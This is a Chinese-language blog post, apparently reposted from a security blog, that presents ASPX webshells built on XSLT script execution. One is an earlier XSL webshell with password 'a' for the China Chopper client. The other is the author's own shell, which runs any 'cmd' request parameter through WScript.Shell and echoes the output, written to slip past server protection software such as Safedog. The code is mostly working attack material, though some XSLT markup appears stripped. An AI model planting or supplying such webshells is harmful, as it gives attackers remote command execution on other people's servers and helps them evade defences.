关于使用xsl的webshell以前已经有人发过了,比如aspx的一个webshell如下:
string xml=@"test";
string xslt=@"
XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""
zcgonvh"">
PublicKeyToken=b77a5c561934e089""/>
PublicKeyToken=b77a5c561934e089""/>
Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
PublicKeyToken=b03f5f7f11d50a3a""/>
";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());
%>
密码为 a,这个webshell是可以用菜刀连接的,测试碰到这种情况:服务器有安全狗等防护软件,提交的各种数据包可能会拦截,而现在想要做的就是执行命令就可以了,为了方便,写了一个命令执行的webshell,可回显,可改密码,具体代码如下:
string xml=@"test";
string xslt=@"
var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;
var command = Request.Item['cmd'];
var r = new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+command);
var OutStream = r.StdOut;
var Str = """";
while (!OutStream.atEndOfStream) {
Str = Str + OutStream.readAll();
}
Response.Write(""
""+Str+"""");
}]]>
";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XsltSettings xslt_settings = new XsltSettings(false, true);
xslt_settings.EnableScript = true;
try{
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,xslt_settings,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());
}
catch (Exception e){
Response.Write("Error");
}
%>
密码为cmd,可自己改,测试如下图:
附带一个大马里面的命令执行:
Program
c:\windows\system32\cmd.exe
Arguments
/c net user
https://github.com/Ridter/Pentest/
https://github.com/Ridter/Pentest/stargazers
文章出处:Evi1cg's blog
你可能喜欢
领取专属 10元无门槛券
私享最新 技术干货